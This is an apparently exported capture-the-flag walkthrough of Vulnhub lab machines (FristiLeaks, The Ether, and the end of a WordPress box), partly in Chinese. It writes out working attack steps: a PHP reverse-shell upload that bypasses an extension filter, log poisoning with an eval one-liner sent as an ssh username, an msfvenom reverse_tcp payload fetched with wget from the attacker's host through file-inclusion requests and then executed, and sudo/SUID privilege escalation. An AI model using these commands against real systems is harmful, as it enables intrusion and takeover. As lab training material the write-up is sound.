src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>SQL injection is present</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Listing the databases</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_11.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_12.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The WordPress8080 database contains the WordPress username and password</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Log in to the admin panel and change the language to Chinese</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_14.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n8570' class='md-header-anchor '></a>Getting a shell</h3><p>There are two ways to get a shell from WordPress. One is to add a plugin: package a correctly formatted shell into a .zip and upload it.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_15.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The other is to edit a theme file directly.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Here the direct-edit approach is used to get a shell: write the shell into the 404 page.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Start a local netcat listener</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Visiting the 404 page triggers the reverse shell</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_19.jpg' alt='' referrerPolicy='no-referrer' /></p><p>View passwd</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_20.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_21.jpg' alt='' referrerPolicy='no-referrer' /></p><h1><a name='header-n8599' class='md-header-anchor '></a>Section 7: FristiLeaks v1.3</h1><h2><a name='header-n8600' class='md-header-anchor '></a>Target information</h2><h3><a name='header-n8601' class='md-header-anchor '></a>Download links</h3><p><a href='https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent' target='_blank' class='url'>https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent</a> <a href='https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova' target='_blank' class='url'>https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova</a></p><h3><a name='header-n8605' class='md-header-anchor '></a>Runtime environment</h3><ul><li>VirtualBox (either one)</li><li>VMware Workstation Player</li></ul><h3><a name='header-n8613' class='md-header-anchor '></a>Setup</h3><p>According to the description on the official site, the VMware virtual machine's MAC address must first be set to 08:00:27:A5:A6:76 <img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Then start the VM</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_2.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n8621' class='md-header-anchor '></a>Host discovery</h3><p><code>netdiscover -r 10.10.10.0/24</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_3.jpg' alt='' referrerPolicy='no-referrer' /><br/></p><p>The target host is found at 10.10.10.132</p><h3><a name='header-n8628' class='md-header-anchor '></a>Service discovery</h3><p><code>nmap -sS -Pn -T4 -p- 10.10.10.132</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Port 80 is open, with service HTTP</p><h3><a name='header-n8635' class='md-header-anchor '></a>Detailed scan of port 80</h3><p>Only port 80 is open, so probe it in detail:</p><p><code>nmap -A -O -p80 10.10.10.132</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>This yields the following useful information:</p><pre class="md-fences md-end-block" lang="">Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
http-robots.txt: 3 disallowed entries</pre><p>Browse the web site</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The nmap results show a <code>robots.txt</code> file; take a look:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_7.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Visit the three paths mentioned in <code>robots.txt</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>All three directories have the same content: only the image above.</p><p>Next, enumerate directories:</p><p><code>dirb http://10.10.10.132</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Several pictures are found in the <code>images</code> directory:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Looking at the pictures, <code>keep-calm</code> seems to be a hint:</p><p>KEEP CALM AND DRINK FRISTI</p><p>Try visiting <a href='http://10.10.10.132/fristi' target='_blank' class='url'>http://10.10.10.132/fristi</a>/</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_11.jpg' alt='' referrerPolicy='no-referrer' /></p><p>A login page is found. The login form has a serious security issue: both input fields have autocomplete enabled (including the password field). <br/> <img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_12.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Scan this directory:</p><p><code>dirb http://10.10.10.132/fristi/</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The index page of the <code>upload</code> directory is found</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_14.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Viewing the page source reveals a clue:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_15.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The information in the comment indicates that this page was left by someone called eezeepz.</p><p>Presumably <code>eezeepz</code> is a username or a password</p><p>Further down there is a large block of base64-encoded text</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Copy it into a file, then decode it with:</p><p><code>base64 -d /tmp/encoded.txt</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Judging by the file header, this is a PNG image, so save it as PNG</p><p><code>base64 -d /tmp/encoded.txt > decoded.png</code></p><p>Opening it reveals a string</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Try logging in with the information gathered above:</p><pre class="md-fences md-end-block" lang="">username:eezeepz
password:keKkeKKeKKeKkEkkEk</pre><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_19.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Login succeeds and a file upload form appears. The upload point applies no filtering at all, so a shell file can be uploaded directly.</p><p>The PHP reverse-shell script can be downloaded here: <a href='http://pentestmonkey.net/tools/web-shells/php-reverse-shell' target='_blank' class='url'>http://pentestmonkey.net/tools/web-shells/php-reverse-shell</a></p><pre class="md-fences md-end-block" lang="bash"> <div 
class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">cp</span> /usr/share/webshells/php/php-reverse-shell.php reverse-shell.php</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">vi</span> reverse-shell.php</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p>修改反彈shell的ip地址和監聽端口。</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_20.jpg' alt='' referrerPolicy='no-referrer' /></p><p>使用<code>nc</code>監聽端口:</p><p><code>nc -nlvp 8888</code></p><p><img 
src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_21.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>根據回顯,只有png, jpg, gif 能上傳</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_22.jpg' alt='' referrerPolicy='no-referrer' /></p><p>修改一下文件名,后綴加上<code>.jpg</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_23.jpg' alt='' referrerPolicy='no-referrer' /> <br/> 上傳成功,打開上傳的shell: <br/> <img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_24.jpg' alt='' referrerPolicy='no-referrer' /></p><p>現在已經得到了一個低端權限 <br/> <img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_25.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n8754' class='md-header-anchor '></a>權限提升</h3><p>翻看一下目錄,在<code>home</code>目錄</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_27.jpg' alt='' referrerPolicy='no-referrer' /> <br/> 看到關鍵人物eezeepz的家目錄</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_28.jpg' alt='' referrerPolicy='no-referrer' /></p><p>在<code>notes.txt</code>當中得到提示: <br/> <img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_29.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根據提示說明,在/tmp下創建一個<code>runtis</code>文件</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_30.jpg' alt='' referrerPolicy='no-referrer' /> <br/></p><h3><a name='header-n8772' class='md-header-anchor '></a>賦予權限</h3><p>根據<code>notes.txt</code>的提示,在<code>/tmp/runtis</code>當中寫入的命令會定時執行,那么,修改<code>/home/admin</code>目錄的權限。</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_31.jpg' alt='' referrerPolicy='no-referrer' /> <br/> 等待系統執行命令之后,就可以閱讀 <code>/home/admin</code> 下的內容了</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_32.jpg' alt='' referrerPolicy='no-referrer' /></p><p>有幾個文件。依次看一下。</p><p>cryptpass.py</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_33.jpg' alt='' 
referrerPolicy='no-referrer' /> Cryptepass.txt <br/> <img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_34.jpg' alt='' referrerPolicy='no-referrer' /> whoisyourgodnow.txt</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_35.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>看樣子應該是用了py文件去加密的。 重寫一下文件: <br/> <img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_36.jpg' alt='' referrerPolicy='no-referrer' /></p><p>解密試試 <br/> <img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_37.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_38.jpg' alt='' referrerPolicy='no-referrer' /> <br/> 分別得到</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 
0.1px;">1.mVGZ3O3omkJLmy2pcuTq :thisisalsopw123</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">2.=RFn0AKnlMHMPIzpyuTI0ITG :LetThereBeFristi!</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p>這有可能是用戶fristgod 的密碼,組合試試</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_39.jpg' alt='' referrerPolicy='no-referrer' /> <br/> 根據報錯信息,查了資料: 跟 su 命令的實現有關; B環境上su的實現應該是判斷標准輸入是不是tty ; 而A環境上su的實現則允許從其他文件讀取密碼。</p><p>解決方法如下:</p><p><code>Python -c 'import pty;pty.spawn("/bin/sh")'</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_40.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>接下來就可以正常使用了。</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_41.jpg' alt='' referrerPolicy='no-referrer' /> <br/> 查看一下目錄文件:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_43.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看<code>.secret_admin_stuff</code>目錄文件:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_45.jpg' alt='' referrerPolicy='no-referrer' /> 發現這個是個root的文件 權限應該是不夠的</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_46.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>查看命令使用記錄,<code>history</code>命令執行結果:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_47.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>可以看到<code>fristigod</code>用戶一直sudo來執行命令</p><p>嘗試輸入之前得到的兩個密碼:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_50.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>成功登陸:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_51.jpg' alt='' referrerPolicy='no-referrer' /> 
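</p><p>The cryptpass.py scheme used above is keyless: both recovered pairs quoted above are consistent with base64-encoding the password, reversing the string and applying rot13, so anyone who can read the stored file can recover every entry. The Python below is an added example, not code from the original write-up; it assumes that transform (the round-trip of both pairs checks the assumption) and uses the two pairs as constructed sample input.</p>

```python
import base64
import codecs

# Constructed sample input: the two entries the write-up recovered from the
# target's password file, ciphertext -> expected plaintext.
SAMPLE_PAIRS = {
    "mVGZ3O3omkJLmy2pcuTq": "thisisalsopw123",
    "=RFn0AKnlMHMPIzpyuTI0ITG": "LetThereBeFristi!",
}


def encode_string(plaintext: str) -> str:
    """Forward transform assumed for cryptpass.py: base64, reverse, rot13.

    No step depends on a secret, so this is an encoding, not encryption.
    """
    b64 = base64.b64encode(plaintext.encode("utf-8")).decode("ascii")
    return codecs.encode(b64[::-1], "rot13")


def decode_string(ciphertext: str) -> str:
    """Undo the transform: rot13 is self-inverse, then un-reverse, then base64-decode."""
    reversed_b64 = codecs.decode(ciphertext, "rot13")
    b64 = reversed_b64[::-1]
    # validate=True rejects characters outside the base64 alphabet instead of
    # silently dropping them, so a line not produced by the transform raises
    # binascii.Error (a ValueError subclass).
    return base64.b64decode(b64, validate=True).decode("utf-8")


def recover_passwords(lines: list[str]) -> dict[str, str]:
    """Decode every non-empty line of a cryptpass-style file.

    Lines that do not decode cleanly are left out of the result rather than
    aborting the whole run.
    """
    recovered = {}
    for line in lines:
        token = line.strip()
        if not token:
            continue
        try:
            recovered[token] = decode_string(token)
        except (ValueError, UnicodeDecodeError):
            continue
    return recovered


if __name__ == "__main__":
    for ciphertext, plaintext in recover_passwords(list(SAMPLE_PAIRS)).items():
        print(f"{ciphertext} -> {plaintext}")
```

<p>The point for defenders is that a reversible transform with no secret is equivalent to storing the password in clear; a password file needs a salted, slow hash, which no decoder of this kind can invert.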
</p><p>Use <code>sudo</code> to escalate privileges and spawn a shell:</p><p><code>sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_52.jpg' alt='' referrerPolicy='no-referrer' /> Look at the files under /root directly.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_53.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>Read the flag file to obtain the flag.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_54.jpg' alt='' referrerPolicy='no-referrer' /></p><h1><a name='header-n8868' class='md-header-anchor '></a>Section 8: The Ether</h1><h2><a name='header-n8869' class='md-header-anchor '></a>Target information</h2><h3><a name='header-n8870' class='md-header-anchor '></a>Download link</h3><p><a href='http://www.mediafire.com/file/502nbnbkarsoisb/theEther.zip' target='_blank' class='url'>http://www.mediafire.com/file/502nbnbkarsoisb/theEther.zip</a></p><h3><a name='header-n8873' class='md-header-anchor '></a>Environment</h3><ul><li>This target is provided as a VMware image; download it from Vulnhub, unpack it and run the <code>vmx</code> file.</li><li>Target: by default the VM obtains its network configuration automatically. Once started it bridges to the physical NIC and joins the network.</li><li>Attacker: the Kali VM runs in VirtualBox, also in bridged mode, and can then reach the target.</li></ul><h3><a name='header-n8884' class='md-header-anchor '></a>Target description</h3><p>This target is moderately difficult and not suited to beginners.</p><p>The goal is to compromise the machine and find the flag hidden on the system.</p><p>The official hint: there is a relevant file on the machine that plays an important part in the attack, but do not waste time trying to de-obfuscate it.</p><h2><a name='header-n8891' class='md-header-anchor '></a>Information gathering</h2><ul><li>IP discovery</li></ul><p>First check Kali's network configuration. <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277606485214.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Then use fping to discover the target. <code>fping -asg 192.168.1.0/24</code> finds four live IPs on the subnet.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277612581371.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Port scanning and service identification</li></ul><p>Scan the <code>192.168.1.0/24</code> subnet with nmap's fast-scan option (<code>-F</code>):</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277613128019.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The <code>MAC</code> addresses make the hosts easy to tell apart: <code>192.168.1.1</code> is a TP-Link router, <code>192.168.1.100</code> an Apple device and <code>192.168.1.101</code> a VMware virtual machine, so <code>192.168.1.101</code> is the target's IP.</p><p>With the target IP known, run a more detailed nmap probe: <code>nmap -A -v 192.168.1.101 -oN nmap.txt</code></p><p>The parameters:</p><ul><li><code>-A</code> thorough scan of the target IP, loading all scripts to gather as much information as possible;</li><li><code>-v</code> show detailed scan progress;</li><li><code>-oN</code> write the results as plain text to <code>nmap.txt</code>. The results: <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277637460813.jpg' alt='' referrerPolicy='no-referrer' /></li></ul><ul><li>Threat modelling</li></ul><p>The nmap results show that only ports <code>22</code> and <code>80</code> are open and that the system is <code>Ubuntu</code>. Port <code>22</code> is <code>SSH</code> and port <code>80</code> is <code>http</code>, served by <code>Apache/2.4.18</code>.</p><p>Web applications usually have problems of one kind or another, so after this initial analysis the web service is chosen as the entry point.</p><h2><a name='header-n8939' class='md-header-anchor '></a>Web vulnerability discovery</h2><h3><a name='header-n8940' class='md-header-anchor '></a>1. Using the nikto web vulnerability scanner</h3><p>Scan for web vulnerabilities with nikto, <code>nikto -h 192.168.1.101</code>; <code>-h</code> specifies the target. <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277621096032.jpg' alt='' referrerPolicy='no-referrer' /></p><p>No obvious high-risk vulnerabilities are found. An <code>images</code> directory and an <code>/icons/README</code> file show up, neither of any use.</p><h3><a name='header-n8946' class='md-header-anchor '></a>2. Scanning site directories with dirb</h3><p><code>dirb http://192.168.1.101</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277623420335.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Apart from some static files, nothing exploitable is found.</p><h3><a name='header-n8953' class='md-header-anchor '></a>3. 
Browsing the site's functions</h3><p>The first two reconnaissance steps found no vulnerability, so browse the site manually and analyse its functions.</p><p>Clicking the <code>ABOUT US</code> link gives the URL <code>http://192.168.1.101/?file=about.php</code>, which suggests a possible arbitrary file inclusion.</p><h3><a name='header-n8958' class='md-header-anchor '></a>4. Testing for file inclusion</h3><p>To see the results clearly, Burp Suite is used to handle the HTTP requests here.</p><p>Trying to include Linux system configuration files shows that there are some restrictions.</p><p>For example, including <code>/etc/passwd</code> returns nothing. <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277629489901.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Several common Apache log paths were then tested:</p><pre class="md-fences md-end-block" lang="">/var/log/apache/access.log
/var/log/apache2/access.log
/var/www/logs/access.log
/var/log/access.log</pre><p>None returned anything.</p><p>Perhaps the log path was changed in the configuration; trying to read the Apache2 configuration file <code>/etc/apache2/apache2.conf</code> also fails.</p><p>Trying to read PHP source through a php wrapper yields nothing either:</p><p><code>file=php://filter/convert.base64-encode/resource=index.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277632154094.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Based on the file-inclusion exploitation notes I compiled earlier:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277635091513.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Combined with the earlier reconnaissance, the target only runs <code>http</code> and <code>ssh</code>. Since including the Apache logs failed, try including the ssh login log.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277638432449.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The ssh login log is read successfully.</p><h2><a name='header-n8989' class='md-header-anchor '></a>Getting a shell</h2><h3><a name='header-n8990' class='md-header-anchor '></a>1. 
Getting a one-liner webshell</h3><p>Use a PHP one-liner as the username when logging in to the target's ssh:</p><p><code>ssh '&lt;?php eval($_GET['f']); ?&gt;'@192.168.1.101</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277640398321.jpg' alt='' referrerPolicy='no-referrer' /></p><p>SSH logs the login attempt, which writes the one-liner into the ssh log file. Check whether it worked:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277643786689.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The one-liner has been written successfully.</p><h3><a name='header-n9003' class='md-header-anchor '></a>2. Generating a Meterpreter shell with msfvenom</h3><p>Msf is the tool I use most, so it is the main tool for the rest of the attack.</p><p>First generate a shell binary for Linux:</p><p><code>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 -f elf > shell.elf</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277683325190.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9012' class='md-header-anchor '></a>3. 
Setting up the Metasploit listener</h3><pre class="md-fences md-end-block" lang="">use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.1.102
exploit</pre><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277699437724.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9016' class='md-header-anchor '></a>4. Planting the Meterpreter shell</h3><p>First start a simple web server with Python: <code>python -m SimpleHTTPServer 80</code></p><p>Then use the one-liner obtained earlier to execute commands that download the generated payload and run it.</p><p>Send the following requests in turn:</p><ol><li><code>/?file=/var/log/auth.log&amp;f=system('wget+192.168.1.102/shell.elf')%3b</code></li><li><code>/?file=/var/log/auth.log&amp;f=system('chmod+%2bx+shell.elf')%3b</code></li><li><code>/?file=/var/log/auth.log&amp;f=system('./shell.elf')%3b</code></li></ol><p>Notes:</p><ol><li>Because the commands contain spaces, plus signs and other special characters, the payload must be URL-encoded before it will execute correctly.</li><li>The generated file has no execute permission and cannot run after being downloaded to the target, so <code>shell.elf</code> must first be made executable and then run.</li></ol><p>Result:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277699964066.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Output of the web server and of msf:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277706402332.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9052' class='md-header-anchor '></a>Privilege escalation</h2><p>The basic approach to Linux privilege escalation:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277780553156.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9057' class='md-header-anchor '></a>1. 
Exploit-based privilege escalation</h3><p>With a Meterpreter shell on the target, take a quick look at the system information.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277711519803.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The system is <code>Ubuntu 16.04 (Linux 4.10.0-40-generic)</code>. A privilege-escalation exploit for Ubuntu 16.04 was published recently, so try it here.</p><p>Exploit: <a href='https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c' target='_blank' class='url'>https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c</a></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277744279712.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The escalation fails.</p><h3><a name='header-n9070' class='md-header-anchor '></a>2. Privilege escalation with msf</h3><p><code>use post/multi/recon/local_exploit_suggester</code></p><p>No usable privilege-escalation vulnerability is found.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277748088090.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9079' class='md-header-anchor '></a>3. 
Privilege escalation through a misconfigured SUID file</h3><p>Enter an interactive shell and spawn a bash shell: <code>python -c 'import pty;pty.spawn("/bin/bash")'</code></p><p>In the web directory there is an <code>xxxlogauditorxxx.py</code> that should not be there; it is presumably the special file the challenge refers to, and it is unusually large.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277741330578.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Running the py file shows that it is a log-auditing program. Asking it for the Apache2 log file shows that it runs the <code>cat</code> command, which fails for lack of permissions.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277716185341.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Looking closely at the py file's permissions, it has the SUID bit set and is owned by root.</p><p>Check the user's sudo rights with <code>sudo --list</code>.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277721141332.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The py file can be run as root without a password, which makes things much easier.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277722533145.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Because the py file is misconfigured, commands can be executed directly as root.</p><p>Next, get a shell with root privileges.</p><h3><a name='header-n9106' class='md-header-anchor '></a>4. 
